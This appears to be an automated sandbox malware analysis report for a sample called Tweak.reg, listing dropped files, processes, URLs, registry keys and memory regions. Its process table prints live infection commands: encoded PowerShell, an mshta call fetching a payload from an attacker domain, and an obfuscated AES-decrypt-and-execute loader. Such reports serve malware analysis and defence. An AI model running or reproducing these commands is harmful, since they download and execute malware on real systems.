Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
Tweak.reg
|
data
|
initial sample
|
 |
|
|
C:\Users\user\AppData\Roaming\AutoIt3.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
|
|
|
C:\ProgramData\Microsoft\Network\Downloader\edb.log
|
data
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
|
Extensible storage engine DataBase, version 0x620, checksum 0xe073f7d0, page size 16384, DirtyShutdown, Windows version 10.0
|
dropped
|
||
|
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\DonaldDuck[1]
|
PE32 executable (console) Intel 80386, for MS Windows
|
dropped
|
||
|
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1vvz2bcy.esf.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4uxr2oyi.1lu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5gthlxnz.qv5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_agqxyxas.jlz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_crqk20xl.oxo.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_j5zq2dem.nks.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lkqy3knp.b2r.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nzrc3koz.1av.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rqggwtie.xk4.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zkrywyf5.con.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zlrxjdq2.zt2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zvo4rur4.22a.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\DesolateOxidant.a3x
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\DesolateOxidant.zip
|
Zip archive data, at least v2.0 to extract, compression method=deflate
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\1O7BHFDGG86YGP2V2GV8.temp
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms~RF4fa325.TMP
(copy)
|
data
|
dropped
|
||
|
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\VMFMTNSFZOPWJ6SRSJ9A.temp
|
data
|
dropped
|
||
|
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
|
JSON data
|
dropped
|
There are 16 hidden files, click here to show them.
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
C:\Windows\regedit.exe
|
"regedit.exe" "C:\Users\user\Desktop\Tweak.reg"
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA
|
|
|
|
C:\Windows\System32\mshta.exe
|
"C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split
($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD
= [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D794355577548');$WkCTD.IV = New-Object
byte[] 16;$tcgVjsHd = $WkCTD.CreateDecryptor();$HeZGuqYHp = $tcgVjsHd.TransformFinalBlock($SQYQyiT, 0, $SQYQyiT.Length);$sMCijoeKV
= [System.Text.Encoding]::Utf8.GetString($HeZGuqYHp);$tcgVjsHd.Dispose();& $sMCijoeKV.Substring(0,3) $sMCijoeKV.Substring(3)
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe" -eNC LgAnAG0AcwBoAHQAYQAnAGgAdAB0AHAAcwA6AC8ALwBwAHcAcwBoADIALgBwAGEAagBhAG0AYQBzAC0AcwB0AG8AaQBjAC0AZgBhAGkAbABpAG4AZwAuAGwAbwBsAC8AdwBlAGIAZABhAHYALwByAGUAZwAvAEQAbwBuAGEAbABkAEQAdQBjAGsA
|
|
|
|
C:\Windows\System32\mshta.exe
|
"C:\Windows\system32\mshta.exe" https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
|
|
|
|
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop function tCqzac($xDlOy){return -split
($xDlOy -replace '..', '0x$& ')};$SQYQyiT = tCqzac('2F92616FCA1E637E204E02A98BAB656B9EC67566C63384DBBA915194A26AF3C99FF78C879D2671A61F9DE3FFD05CE7A373EC6999C11F2AE65D883254059A8F5DD52C6EF70BFD4877EC5470233CCF8C213A8F6C3B33F727D7EFEF9E317E238D51754C64F55FD36A2589609D7C13781064CD0882248925DC090ED875EA7328A961D8F19BDA01E615861B627059F79049F57B3247A84C248BA78C08603403E1AE25A41B0A8E9DD38F8C4A4081D4274AE388388659516790B04238778E0F5658CC4E7B8F740A831B86CE3EFD019A79F77BE8F78EB2E2CA234D0C6D81A7CEACE3F908562BA1EA41EAB6FF399EF717AA496847BEFD1DEB1F7B5AA3887325ABF9EEF02FE6982E64EC9D3A2425D14C12AD043DC5C6031BE4743B30CB9771A566A007E065215522047C54A3A10753B2A266B4BE44ABB6CC95BD1C8F09E68F17760528BCA6460C89ABD112854B22D2A30FEFACBDAD91533869CBAA510D9AEE6DFA15E320B7AFD60201785519583AE149ADC0F90A8952F25FF47A4ED635E1B047ACFE73F6A3F4DE14C2A855847AF9BE35A9B33A08C7ABF7A00F27594B28D5E0FA51AA3F90BF24D901F140F816D5D4EBF7AA6FA485FDC8089FEF1D65D5798A7A7C513EFB05E816E80A2F1DDFE3BA76DA0E722B38F8740DCB9E6E71B59D4E4CDFAA9F2EF98D1569B83EA76739999F4AFC232F29ABC60B904DFCCA5F115A5A8559E36094E8F37943EFCABA23E670D451CE32C68AD3028B217CEEF7FB1CF47C97D30D069B3F065987B4F034029EE5D245366FE897472BBF68358F983C4388E9EDBE009B15763EA5A4C065248C0153CB15A281585BC9621504C2AB9E8F3BA0A95A0DCF141ADD7A86BB23134BB59CE46943F1107FE42751B10616A7FA72EA7AA54509CB02831AE69BDF94A6D6FED1A11CEBA936D6B8DE427BDACBAA0AAD1A7CFBEB89E6108DEF6F0852AF4BB67846A3ACF806D21D324D0C50B0F62CAD51058D241391A6B2446D777805760A992C50DBC13108296D969C721CEC4BA28B6488AB72DF32BD755FC7D5C5D3D56680F0AAB9BDC8DD664CBBF8E2BCDD82462778CEF31E33C24A4749F12603EB49D4C9D110A17107C7B97C1E54EB654988E65CE15CD969F93C091DFABE466D71228914296A73B782ECF0FFF3DF80313CA3128BCD8296F524EE35DB155C2AE0EF4C69075B57E36D24E8E31218CA60AA4FA168657C062B42B2F5EA45AAFDBF6276668F6A9F867184E90C03C86C65BCCE49654A66FA3D306694FFACDD32F762E1D88075F651C9159F15813EEE0CA477A8C578C19D44D1E39E106809A3CD869B8E088ACDCCE32E23A70F5F942E8DAEE3012D81B73B3B94D05D727127DFDA24F3F54EC5E3BFAC83121DF59E941DC4ACA17CA5EAD44C61DE8BDF84E32290F7543ABE02060DC41362B94A5F07EEEE330B97553B46859432CC68F214B302C4E6F63055D0F83E01F7974F1B300238EEC9B49AC5DE3C1D9A3ED90F4056FDACE9CD348ACE2412CC387A9FF17100724C029B670EA9C692E997BFF90AA0531E793E1DD4154E64151DCFF01CCE768C6DB40FFFF11494DF2DB99E1C1159873FA31A4E0EB1036654DE9137700E275DE2AE79BCB348D213215787A6A3452F822EF24303FC84259471E723768093E063D12DFCA583A0490658323B87F8A0C3E9109F45D9A37F26AC77552D7C68589CA46A0E8D1AB24D1B10A54D0FB256338B5880738577EC794452BC27B0BA2FD9C876306E1588376A94292582E639FBC261E841194317C38EC2F485F56690F6ACE333EE430ED468C2F9690E96F6497247EDA10E0FF53275B4125360F8405E4758A308E913B6295D4F395D02B2239E6E4257B5152E7F8ACD075E8C6B312EC73595C476BB1E814D001B81F9');$WkCTD
= [System.Security.Cryptography.Aes]::Create();$WkCTD.Key = tCqzac('7151766748794165544D794355577548');$WkCTD.IV = New-Object
byte[] 16;$tcgVjsHd = $WkCTD.CreateDecryptor();$HeZGuqYHp = $tcgVjsHd.TransformFinalBlock($SQYQyiT, 0, $SQYQyiT.Length);$sMCijoeKV
= [System.Text.Encoding]::Utf8.GetString($HeZGuqYHp);$tcgVjsHd.Dispose();& $sMCijoeKV.Substring(0,3) $sMCijoeKV.Substring(3)
|
|
|
|
C:\Users\user\AppData\Roaming\AutoIt3.exe
|
"C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
|
|
|
|
C:\Users\user\AppData\Roaming\AutoIt3.exe
|
"C:\Users\user\AppData\Roaming\AutoIt3.exe" "C:\Users\user\AppData\Roaming\DesolateOxidant.a3x"
|
|
|
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\svchost.exe
|
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
|
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
There are 4 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
https://pwsh2.pajamas-stoic-failing.lol/
|
unknown
|
|
|
|
https://pwsh2.pajamas-stoic-failing.lol
|
unknown
|
|
|
|
https://pwsh2.pa
|
unknown
|
|
|
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck
|
188.114.96.3
|
|
|
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck.IE5
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck&Y
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck~
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckIE5P2
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckSSC:
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckw
|
unknown
|
||
|
https://contoso.com/License
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#&
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckn
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2.C:
|
unknown
|
||
|
https://aka.ms/pscore6
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckhF
|
unknown
|
||
|
https://www.autoitscript.com/autoit3/
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckorer
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckh
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckc
|
unknown
|
||
|
https://g.live.com/odclientsettings/Prod.C:
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DesolateOxidant.zip
|
188.114.96.3
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckY
|
unknown
|
||
|
https://contoso.com/
|
unknown
|
||
|
https://nuget.org/nuget.exe
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckC:
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckO
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckP
|
unknown
|
||
|
http://crl.micft.cMicRosof
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck...
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckL
|
unknown
|
||
|
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckF
|
unknown
|
||
|
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckH
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckE
|
unknown
|
||
|
http://nuget.org/NuGet.exe
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelp
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckRF
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckwF
|
unknown
|
||
|
http://pesterbdd.com/images/Pester.png
|
unknown
|
||
|
http://schemas.xmlsoap.org/soap/encoding/
|
unknown
|
||
|
http://www.apache.org/licenses/LICENSE-2.0.html
|
unknown
|
||
|
https://go.micro
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#IE5P2
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck2
|
unknown
|
||
|
http://crl.mic
|
unknown
|
||
|
https://contoso.com/Icon
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckrei
|
unknown
|
||
|
https://aka.ms/winsvr-2022-pshelpX
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck...)
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckLMEM
|
unknown
|
||
|
http://crl.ver)
|
unknown
|
||
|
http://www.autoitscript.com/autoit3/X
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck)
|
unknown
|
||
|
https://github.com/Pester/Pester
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck9F
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#
|
unknown
|
||
|
http://crl.m
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckime
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#S
|
unknown
|
||
|
https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
|
unknown
|
||
|
http://schemas.xmlsoap.org/wsdl/
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#Z
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck#==h
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck$global:?
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckhttps://pwsh2.pajamas-stoic-failing.lol
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuckdeflate
|
unknown
|
||
|
https://aka.ms/pscore68
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DesolateOxidant.zipp
|
unknown
|
||
|
https://pwsh2.pajamas-stoic-failing.lol/webdav/reg/DonaldDuck...M/~
|
unknown
|
There are 62 hidden URLs, click here to show them.
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
pwsh2.pajamas-stoic-failing.lol
|
188.114.96.3
|
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
188.114.96.3
|
pwsh2.pajamas-stoic-failing.lol
|
European Union
|
|
|
|
127.0.0.1
|
unknown
|
unknown
|
Registry
|
Path
|
Value
|
Malicious
|
|
|---|---|---|---|
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce
|
MegaLIMLauncher
|
|
|
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\BITS
|
PerfMMFileName
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
|
FileDirectory
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableAutoFileTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
EnableConsoleTracing
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
ConsoleTracingMask
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
MaxFileSize
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
|
FileDirectory
|
There are 6 hidden registries, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
20566D31000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B3A0000
|
trusted library allocation
|
page read and write
|
||
|
1CAD6490000
|
heap
|
page read and write
|
||
|
1A5E4C74000
|
heap
|
page read and write
|
||
|
7FFD9B1B0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9B146000
|
trusted library allocation
|
page read and write
|
||
|
20566D60000
|
trusted library allocation
|
page read and write
|
||
|
1A5E5360000
|
trusted library allocation
|
page read and write
|
||
|
7DA8FFF000
|
stack
|
page read and write
|
||
|
1887C960000
|
trusted library allocation
|
page read and write
|
||
|
1CAD67E9000
|
heap
|
page read and write
|
||
|
20567B88000
|
heap
|
page read and write
|
||
|
1872620E000
|
heap
|
page read and write
|
||
|
187261F9000
|
heap
|
page read and write
|
||
|
1FD651F0000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8C0A000
|
trusted library allocation
|
page read and write
|
||
|
2CA54FE000
|
unkown
|
page readonly
|
||
|
2056BC3E000
|
heap
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
1A5EA21C000
|
trusted library allocation
|
page read and write
|
||
|
1CAD88F7000
|
heap
|
page read and write
|
||
|
187262B8000
|
heap
|
page read and write
|
||
|
1760C6CD000
|
trusted library allocation
|
page read and write
|
||
|
2056BE16000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8E7C000
|
trusted library allocation
|
page read and write
|
||
|
14E4E0AF000
|
heap
|
page read and write
|
||
|
1FD64F34000
|
trusted library allocation
|
page read and write
|
||
|
20567AF6000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
14E33D75000
|
heap
|
page read and write
|
||
|
205679BE000
|
heap
|
page read and write
|
||
|
156B000
|
heap
|
page read and write
|
||
|
2056C060000
|
trusted library allocation
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
289D7E000
|
stack
|
page read and write
|
||
|
1CAD8C09000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8C1B000
|
trusted library allocation
|
page read and write
|
||
|
1CAD8C06000
|
trusted library allocation
|
page read and write
|
||
|
1B9A7F1C000
|
trusted library allocation
|
page read and write
|
||
|
1760A74A000
|
heap
|
page read and write
|
||
|
15CC000
|
heap
|
page read and write
|
||
|
39D5000
|
heap
|
page read and write
|
||
|
1CAD8C35000
|
trusted library allocation
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
1872629C000
|
heap
|
page read and write
|
||
|
7FFD9B520000
|
trusted library allocation
|
page execute and read and write
|
||
|
1A5E4D13000
|
heap
|
page read and write
|
||
|
20567AF4000
|
heap
|
page read and write
|
||
|
1CAD89C0000
|
heap
|
page read and write
|
||
|
7FFD9B380000
|
trusted library allocation
|
page read and write
|
||
|
1CAD6490000
|
heap
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
1CAD8DC0000
|
trusted library allocation
|
page read and write
|
||
|
18800006000
|
trusted library allocation
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
18726295000
|
heap
|
page read and write
|
||
|
188010AB000
|
trusted library allocation
|
page read and write
|
||
|
1A5EA517000
|
heap
|
page read and write
|
||
|
1A5E551A000
|
heap
|
page read and write
|
||
|
7FFD9B2C0000
|
trusted library allocation
|
page read and write
|
||
|
3919000
|
heap
|
page read and write
|
||
|
205679F6000
|
heap
|
page read and write
|
||
|
1A5EA2F0000
|
trusted library allocation
|
page read and write
|
||
|
1A5E551A000
|
heap
|
page read and write
|
||
|
14E4DF70000
|
heap
|
page read and write
|
||
|
1887E7F0000
|
heap
|
page execute and read and write
|
||
|
28AC4E000
|
stack
|
page read and write
|
||
|
1CAD8C1E000
|
trusted library allocation
|
page read and write
|
||
|
1CAD89C0000
|
heap
|
page read and write
|
||
|
3D6B000
|
heap
|
page read and write
|
||
|
1B9A7D6F000
|
heap
|
page read and write
|
||
|
1484000
|
heap
|
page read and write
|
||
|
205679C7000
|
heap
|
page read and write
|
||
|
2056BE19000
|
trusted library allocation
|
page read and write
|
||
|
1CAD647D000
|
heap
|
page read and write
|
||
|
4480000
|
direct allocation
|
page read and write
|
||
|
1CAD88EA000
|
heap
|
page read and write
|
||
|
7FFD9B3B0000
|
trusted library allocation
|
page read and write
|
||
|
3AC0000
|
heap
|
page read and write
|
||
|
7FFD9B282000
|
trusted library allocation
|
page read and write
|
||
|
205679C1000
|
heap
|
page read and write
|
||
|
1554000
|
heap
|
page read and write
|
||
|
20567990000
|
heap
|
page read and write
|
||
|
1CAD8D20000
|
trusted library allocation
|
page read and write
|
||
|
20567AAE000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
1C2D42A4000
|
heap
|
page read and write
|
||
|
14E3805E000
|
trusted library allocation
|
page read and write
|
||
|
2056BC38000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
14E33EC0000
|
heap
|
page read and write
|
||
|
1CAD8CE0000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B400000
|
trusted library allocation
|
page read and write
|
||
|
1CAD88ED000
|
heap
|
page read and write
|
||
|
7FFD9B290000
|
trusted library allocation
|
page read and write
|
||
|
7FFD9B2F0000
|
trusted library allocation
|
page read and write
|
||
|
205679BF000
|
heap
|
page read and write
|
||
|
7FFD9B330000
|
trusted library allocation
|
page read and write
|
||
|
205679C3000
|
heap
|
page read and write
|
||
|
205679C6000
|
heap
|
page read and write
|
||
|
20567976000
|
heap
|
page read and write
|
||
|
1A5E4C90000
|
heap
|
page read and write
|
||
|
1CAD6481000
|
heap
|
page read and write
|
||
|
1CAD6498000
|
heap
|
page read and write
|
||
|
163A000
|
heap
|
page read and write
|
||
|
7FFD9B2B0000
|
trusted library allocation
|
